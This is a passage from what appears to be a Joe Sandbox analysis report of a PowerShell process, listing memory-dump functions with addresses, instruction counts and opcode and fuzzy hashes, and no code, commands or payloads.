                                                                        • Snapshot File: hcaresult_4_2_e10000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 33b554d263cc50ebaa186ccd19a9396a9b1547e82a543f0054e61f328d43bcbb
                                                                        • Instruction ID: a28606714316506846f930b5901702864a94d7239686e2adcd7cf64de85c90fd
                                                                        • Opcode Fuzzy Hash: 33b554d263cc50ebaa186ccd19a9396a9b1547e82a543f0054e61f328d43bcbb
                                                                        • Instruction Fuzzy Hash: 371107B5D04219CFDB08CF9AD9846EEBBB6FB88310F20952AD515F3250DB705985CBA4
                                                                        Function 00CFD0DF Relevance: .1, Instructions: 55COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3261803065.0000000000CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_cfd000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 87de10424c5bfac4a68ffb830550d4e3d4f2d232aa8a80d6bf4e14881253d009
                                                                        • Instruction ID: 4fe854ba04491c2605a21f0f99dc121b00e5ad330fde4c019c1291c5f3d8d662
                                                                        • Opcode Fuzzy Hash: 87de10424c5bfac4a68ffb830550d4e3d4f2d232aa8a80d6bf4e14881253d009
                                                                        • Instruction Fuzzy Hash: 3311E676504384CFCB01CF10D9C0B2ABF72FB84324F24C2A9D9090B616C33AD95ACBA2
                                                                        Function 00E1FF60 Relevance: .1, Instructions: 51COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3262287141.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_e10000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fc266e9f62c26d25ecf2f351ed1389395efe0fd90dc6a3b538d7e6b2ca7456b7
                                                                        • Instruction ID: a2e31a98ac407d0d83c401dd009a74e06b346882c78949b49dd5765d2485993a
                                                                        • Opcode Fuzzy Hash: fc266e9f62c26d25ecf2f351ed1389395efe0fd90dc6a3b538d7e6b2ca7456b7
                                                                        • Instruction Fuzzy Hash: 3F014436340255AFDB108F59EC84F9A77E9EF89B21F108066FB15DB390C6B1D8158790
                                                                        Function 00DAC02A Relevance: .0, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3262145277.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_da0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b59654a5e0be5dd4a001ca3e8180c69063b3c5de92141877e1038a13c9022e0b
                                                                        • Instruction ID: 4bd08c79e4223d38da21123d2fabc61bd9b104f9f4def983e6ab13f80dc0b5a4
                                                                        • Opcode Fuzzy Hash: b59654a5e0be5dd4a001ca3e8180c69063b3c5de92141877e1038a13c9022e0b
                                                                        • Instruction Fuzzy Hash: B8110774A00108EFDB14CFA8D884E9DBBF1AF89314F28C149E404AB361C775ED82CB60
                                                                        Function 00DAA2A3 Relevance: .0, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3262145277.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_da0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4a8df617cccd9a3125d8f14327f9f4e8093daa1e6e494cee75eecfdfedea400d
                                                                        • Instruction ID: 26fd007b8acb9d4c50946d9ee78a568fc716d3cae641993f1a9db6c1d6afe86a
                                                                        • Opcode Fuzzy Hash: 4a8df617cccd9a3125d8f14327f9f4e8093daa1e6e494cee75eecfdfedea400d
                                                                        • Instruction Fuzzy Hash: 43018F78A002189FCB04DB98C4806EDF771FF8E300B249269D95AA7322CB36EC03DB50
                                                                        Function 06DB7721 Relevance: .0, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3294416366.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6db0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 809e9a3277672f5d1d561a1083600fac0c8f873237a3a170db2c4a9a19485ea3
                                                                        • Instruction ID: 9444aea5846d132f4eca66d34a2658510af3d0430a826167cb6e0eb21c527def
                                                                        • Opcode Fuzzy Hash: 809e9a3277672f5d1d561a1083600fac0c8f873237a3a170db2c4a9a19485ea3
                                                                        • Instruction Fuzzy Hash: F3115370D08349DFCB45CFA988456AEBFF5EB85200F1481AAC419A7255E7708A80CB91
                                                                        Function 00CED005 Relevance: .0, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3261714313.0000000000CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ced000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3da2f2c801c0ca8dc668ddd3a9dab6bd93c09c065e6c8002a8505a13cc8aff90
                                                                        • Instruction ID: e6b9ea396743c1525e090024b030d70c4745c4e28d1c93e6e947ab1989a983d2
                                                                        • Opcode Fuzzy Hash: 3da2f2c801c0ca8dc668ddd3a9dab6bd93c09c065e6c8002a8505a13cc8aff90
                                                                        • Instruction Fuzzy Hash: 33014C6240E3C09FE7128B258D94B52BFB49F53224F1D81DBD9998F1A3C2699C49C7B2
                                                                        Function 00CED01D Relevance: .0, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3261714313.0000000000CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ced000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 071f9ff7bb49d8f276bb6acebfcd1111f3a4c62113bd6249eda7e3a311898ccb
                                                                        • Instruction ID: ccad9d65a3610bee5274c9bb7f5ca5de7e1659fe48b35d988f317b4dedcd869c
                                                                        • Opcode Fuzzy Hash: 071f9ff7bb49d8f276bb6acebfcd1111f3a4c62113bd6249eda7e3a311898ccb
                                                                        • Instruction Fuzzy Hash: 4201D671405384DAE7105E27CDC4B67BF98DF41364F1CC45AED5A4B242CAB99941CAB1
                                                                        Function 06DB72B8 Relevance: .0, Instructions: 36COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3294416366.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6db0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 567b82c05f2795e41c6706f48ebf750ae9475fabadf83cea6eb4e2e91030f026
                                                                        • Instruction ID: c6c07d051c9cdae2d6dd68af4cc2691bdcf91f4dd0bbe014946c45ca949e4658
                                                                        • Opcode Fuzzy Hash: 567b82c05f2795e41c6706f48ebf750ae9475fabadf83cea6eb4e2e91030f026
                                                                        • Instruction Fuzzy Hash: AF012470C0A249DFCB51DFB8C9446EEBFF0EB4A300F2042AED85AA3255D3308A44DB52
                                                                        Function 06DB72C8 Relevance: .0, Instructions: 34COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3294416366.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6db0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8bc80af98e704bf95b025aec4134f12725d3f33c517d28c325bcdce6b4b68150
                                                                        • Instruction ID: 6eb9297add8ef49ce57aff6ca3e05b1af959d9c3e5fa520ef5fdc63c19933762
                                                                        • Opcode Fuzzy Hash: 8bc80af98e704bf95b025aec4134f12725d3f33c517d28c325bcdce6b4b68150
                                                                        • Instruction Fuzzy Hash: 85F0E770D05209DFCB94DFA8D9446AEBBF4FB49300F2045A9D819E3254E7319A40DB91
                                                                        Function 07397883 Relevance: .0, Instructions: 32COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3297291785.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7390000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fa5865449d607d001f9bb8ab27f4b4dc115c72b13f00cdda45e719658446d9a2
                                                                        • Instruction ID: c07eedb0ba23f9e67064034b5c22b9900940b5c5dcebaf061ca8136eda3b0b03
                                                                        • Opcode Fuzzy Hash: fa5865449d607d001f9bb8ab27f4b4dc115c72b13f00cdda45e719658446d9a2
                                                                        • Instruction Fuzzy Hash: 46F030757182009BE7548698DC92AA6F797EFC9224F18C07AD90DCB6C1CEB29C43C791
                                                                        Function 00DA2C06 Relevance: .0, Instructions: 29COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3262145277.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_da0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b4394b5257335bb7d554b9a11fc20c9a030f466fd31b9c37dded661b56c1a0bd
                                                                        • Instruction ID: efe88fdfeda1d02d8c77708033a9356065b07182183d53cb9f6ab757d411122c
                                                                        • Opcode Fuzzy Hash: b4394b5257335bb7d554b9a11fc20c9a030f466fd31b9c37dded661b56c1a0bd
                                                                        • Instruction Fuzzy Hash: 71F0D435A00109DFCB15CF9DD990AEEF7B1FF88324F248159E515A72A1C736AC52CB61
                                                                        Function 06D80AF8 Relevance: .0, Instructions: 25COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3294171596.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6d80000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 50cf34f439bed5b23fb65e660e3ff71297b5413a77af8f50acf567e27e5a8ce8
                                                                        • Instruction ID: 15bf951efdee2c41697d9c52016504ebb6d1fa13137f8689098367e145d3930b
                                                                        • Opcode Fuzzy Hash: 50cf34f439bed5b23fb65e660e3ff71297b5413a77af8f50acf567e27e5a8ce8
                                                                        • Instruction Fuzzy Hash: D2F06D3480D2849FCB41DFA8D8945A8BFB4EF46204F1482EEC89997262CA315E56DB51
                                                                        Function 00E1856F Relevance: .0, Instructions: 25COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3262287141.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_e10000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 83e3756105fe7322ffc0766848ae0b1d4c5b9cb7700e1d9e67b589cafe4f95b8
                                                                        • Instruction ID: dd3f874752abce594a3e0b5b96cba1db22c1ba9a50a6e2d43879f8dd260fb305
                                                                        • Opcode Fuzzy Hash: 83e3756105fe7322ffc0766848ae0b1d4c5b9cb7700e1d9e67b589cafe4f95b8
                                                                        • Instruction Fuzzy Hash: 25F09874D04208AFCB44DFA8D945A9DBBB5EB48300F10C1AA9819A3350DB319A91DB51
                                                                        Function 00E18570 Relevance: .0, Instructions: 24COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3262287141.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_e10000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5f3ef02fceda6a702c8febf43ad56312a4f9615781736a3049acc8c7ab7351f6
                                                                        • Instruction ID: 1a210e75bbcd716f3f4c10162272fff43a04edb62e7f877985ed8d3639a74203
                                                                        • Opcode Fuzzy Hash: 5f3ef02fceda6a702c8febf43ad56312a4f9615781736a3049acc8c7ab7351f6
                                                                        • Instruction Fuzzy Hash: D0F0A574D04208EFCB84DFA8D944AADBBF5FB48300F10C1AA9C19A3350DB319A91EF41
                                                                        Function 06DBF7B8 Relevance: .0, Instructions: 22COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3294416366.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6db0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 22d21d68efff6245dc3967991aadc2fdbb996a843133a194db792a24e8ddf0ae
                                                                        • Instruction ID: cfb2d8164f87eaa55fca4c4ab3c59c8723a96ddfd4b3b949ad74037a1d0bad4c
                                                                        • Opcode Fuzzy Hash: 22d21d68efff6245dc3967991aadc2fdbb996a843133a194db792a24e8ddf0ae
                                                                        • Instruction Fuzzy Hash: E3E0E578E04208EFCB84DFA9D8446ACFBF4FB48200F10C1E98819A3355D771AA46DF81
                                                                        Function 00E17430 Relevance: .0, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3262287141.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_e10000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cb345be97d12e7386d0a9b069a435d1152ac1c759b70b3545736ac696d1a8f8d
                                                                        • Instruction ID: 0848abf0f3a7a3a8d19881d064a7194c45942c278bad5d8491720ccb9e9d7971
                                                                        • Opcode Fuzzy Hash: cb345be97d12e7386d0a9b069a435d1152ac1c759b70b3545736ac696d1a8f8d
                                                                        • Instruction Fuzzy Hash: FAD0122001D3D41FD71667B42C187D93F615B03205F26139AE8EA65CA2876547D5D732
                                                                        Function 00E1F7D0 Relevance: .0, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3262287141.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_e10000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ad5cec5154f1aa85e6978e162bfb6d562048dd14483379ce4f3ab439fe1509a0
                                                                        • Instruction ID: 25b5953c0a2a85812ea7234432593348138c1237088bde599a2221295056f0d2
                                                                        • Opcode Fuzzy Hash: ad5cec5154f1aa85e6978e162bfb6d562048dd14483379ce4f3ab439fe1509a0
                                                                        • Instruction Fuzzy Hash: E0E08634904208EBCB04DFA8D8549ADBBB4FB45300F1091AADC0423351C7319E91EB81
                                                                        Function 06DBF170 Relevance: .0, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3294416366.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6db0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a73b75929cfd736cfbe4a8e4c9836a9a22015d206718867bc911d2f0f8211b64
                                                                        • Instruction ID: 720d0b38b854329bd2d3d177232c81de54b1a4f5ce807d48a98d1944ae05f472
                                                                        • Opcode Fuzzy Hash: a73b75929cfd736cfbe4a8e4c9836a9a22015d206718867bc911d2f0f8211b64
                                                                        • Instruction Fuzzy Hash: 79E0BF74D04208EFC784EFA8D9456ACBBF4AB49204F1445A9C809D3355D7719E41DB81
                                                                        Function 06D80B08 Relevance: .0, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3294171596.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6d80000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 02b0783b8fd8b13970f835799f79022f2c41111dba6479926563a6769541471c
                                                                        • Instruction ID: 040a170c8486f1302d25679a95d714c53cc32fce3cb0deb22c8263670a4794b2
                                                                        • Opcode Fuzzy Hash: 02b0783b8fd8b13970f835799f79022f2c41111dba6479926563a6769541471c
                                                                        • Instruction Fuzzy Hash: 70E01234D08208EFCB44EFA8E9496ADBBB8FB45304F1091ADCC1857351CB71AE56DB81
                                                                        Function 00E1E518 Relevance: .0, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3262287141.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_e10000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9de4377baa57d71b197970e6250e4abfa011c1f62580ca25f7df57cf33c4af71
                                                                        • Instruction ID: c74e912f23ce09ac80805f9222af226306c7c8a0142eca96d38cdb7b7032e5fa
                                                                        • Opcode Fuzzy Hash: 9de4377baa57d71b197970e6250e4abfa011c1f62580ca25f7df57cf33c4af71
                                                                        • Instruction Fuzzy Hash: 0BE01274908208DBCB04DFA8E9456ADBBB9FB45308F6091ADDC0927351DB719E82DB81
                                                                        Function 06DBDBA8 Relevance: .0, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3294416366.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6db0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: feda20e964d4e993d5e671c88430254a7100041cfe369b2e3cbbb49252d19174
                                                                        • Instruction ID: 1e23c33ca5a2c643d66fb8728090d0c8d345e45693ac91fb962f6355b1de7281
                                                                        • Opcode Fuzzy Hash: feda20e964d4e993d5e671c88430254a7100041cfe369b2e3cbbb49252d19174
                                                                        • Instruction Fuzzy Hash: 48E0EC70D05248DFCB84EFB8D84979DBBF9FB04201F1011A9884993254EB709A80DB45
                                                                        Function 00E135E1 Relevance: .0, Instructions: 14COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3262287141.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_e10000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a1000165c7e27ebe7155ed3b85bd84eaef75d366156debaa10ec2dafabdf93fc
                                                                        • Instruction ID: c3d4ffdde0e084986eef91d2b1185a3310b981cc097fc9df6ea25dbfcd557976
                                                                        • Opcode Fuzzy Hash: a1000165c7e27ebe7155ed3b85bd84eaef75d366156debaa10ec2dafabdf93fc
                                                                        • Instruction Fuzzy Hash: 92D0123010B2509FC34A9B20DCA08A6BF75DE8620071886DEB4C8CF196CB268B1BC751
                                                                        Function 00E17440 Relevance: .0, Instructions: 11COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3262287141.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_e10000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 23a32f0fc4e34fef1d7c8914663fea7fb955b86f072758cdb5c347f92ebec7ad
                                                                        • Instruction ID: e367abbb04bd47395d5cebb181b5e813f68d06e803ad097ba170616f24959dd3
                                                                        • Opcode Fuzzy Hash: 23a32f0fc4e34fef1d7c8914663fea7fb955b86f072758cdb5c347f92ebec7ad
                                                                        • Instruction Fuzzy Hash: CFC08C300083884BEB1077F8680D3AC37A86B40706F811220D50C308210FB088E0E667
                                                                        Function 06DB66BF Relevance: .0, Instructions: 9COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3294416366.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6db0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4b86079e403fb09270d2f545bb93edc0ddb1fb31300f46aa3152eb9d648d4c53
                                                                        • Instruction ID: 0b4faec4d0b5d40636ae1b60d085e9128cf52c0d103c68954e178da9504780f3
                                                                        • Opcode Fuzzy Hash: 4b86079e403fb09270d2f545bb93edc0ddb1fb31300f46aa3152eb9d648d4c53
                                                                        • Instruction Fuzzy Hash: B9C04879301100AB8248DA18C895C26F7AAABD8255B24C46DA84DC7365EA32EC03CA60
                                                                        Function 06DB7268 Relevance: .0, Instructions: 9COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3294416366.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6db0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9dca2c8980d48db0618d22bb88055bdb5a7b5ba837145f907be0bb87f5468010
                                                                        • Instruction ID: d5f2d07938f31388e8b7f7a130401d2ae9891560b5b76b1c3de8879dd9e42cd1
                                                                        • Opcode Fuzzy Hash: 9dca2c8980d48db0618d22bb88055bdb5a7b5ba837145f907be0bb87f5468010
                                                                        • Instruction Fuzzy Hash: 9CC00276E1001A9A8B40DAD9E4408DCF774EF95321B004026D214A6144D63119268B54

                                                                        Non-executed Functions

                                                                        Function 06D44851 Relevance: .2, Instructions: 213COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3293808970.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6d40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 030fdfdd42a083d4c7acc525655956cf0b92e9ead442eae6c58a9890aff70798
                                                                        • Instruction ID: 8f349cad50f3240271efe66f5c06c8e2b5799865296cfa122f36de5d4515134a
                                                                        • Opcode Fuzzy Hash: 030fdfdd42a083d4c7acc525655956cf0b92e9ead442eae6c58a9890aff70798
                                                                        • Instruction Fuzzy Hash: 5A913670E05208CFDB54EFA9D984B9DBBF2FB89304F148069E508A7294DB349E85DF91
                                                                        Function 06D44860 Relevance: .2, Instructions: 210COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3293808970.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6d40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 22f82bf33f1d9f75a15ed99b096cd953a7562ca35e2514623147a83be92c030c
                                                                        • Instruction ID: ead01021aa2f03827c973383ac9e4d7fea9118397fea35b3c0987b719bb74861
                                                                        • Opcode Fuzzy Hash: 22f82bf33f1d9f75a15ed99b096cd953a7562ca35e2514623147a83be92c030c
                                                                        • Instruction Fuzzy Hash: 6E912570E05208CFDB54EFA9D984B9DBBF2FB89304F148069E509A7294DB349E85DF81
                                                                        Function 06D45201 Relevance: .1, Instructions: 149COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3293808970.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6d40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2adddf52a2e80ab9ae088742636ea9ab3571a090fe5495898b9f2fa6f1e9028d
                                                                        • Instruction ID: 30f108f816ed602e7934e67eb58de7d98e38da1d680d752261458286dee18589
                                                                        • Opcode Fuzzy Hash: 2adddf52a2e80ab9ae088742636ea9ab3571a090fe5495898b9f2fa6f1e9028d
                                                                        • Instruction Fuzzy Hash: 5E510374D15218CFDB64DFA8E8887EDBBF1FB49304F14902AE009A7294DB349D45CB94
                                                                        Function 06D45210 Relevance: .1, Instructions: 145COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3293808970.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6d40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f9038934441da07f26553ed529bee602dcdc9955948fcde878531aa22dd4cdb4
                                                                        • Instruction ID: b96615da2d87e31ac127e82db2b7a8083b86bd16f0e5124cfe65588c9ce3f3b2
                                                                        • Opcode Fuzzy Hash: f9038934441da07f26553ed529bee602dcdc9955948fcde878531aa22dd4cdb4
                                                                        • Instruction Fuzzy Hash: F951F370D09218CFDB64EFA9E8887EDBBF1FB4A304F14902AD409A7294DB749D45CB94
                                                                        Function 06D45416 Relevance: .1, Instructions: 117COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3293808970.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6d40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a86d0ee4fd7cf5777ce5d23f1e4af790144847de45ca19e75c589e6d73cfc988
                                                                        • Instruction ID: 33774c587ce9f66bae90efd57f014d3a0b8626a8fad331172f911d2d10e2bbb1
                                                                        • Opcode Fuzzy Hash: a86d0ee4fd7cf5777ce5d23f1e4af790144847de45ca19e75c589e6d73cfc988
                                                                        • Instruction Fuzzy Hash: 67410570D15208CFDB54EFA8E4947ADBBF1FB4A305F14902AE009A7294DB349D45CF54
                                                                        Function 07390EB8 Relevance: 8.9, Strings: 7, Instructions: 197COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3297291785.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7390000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $a`i$4!$4!$4!$4!$4!$4!
                                                                        • API String ID: 0-1703113314
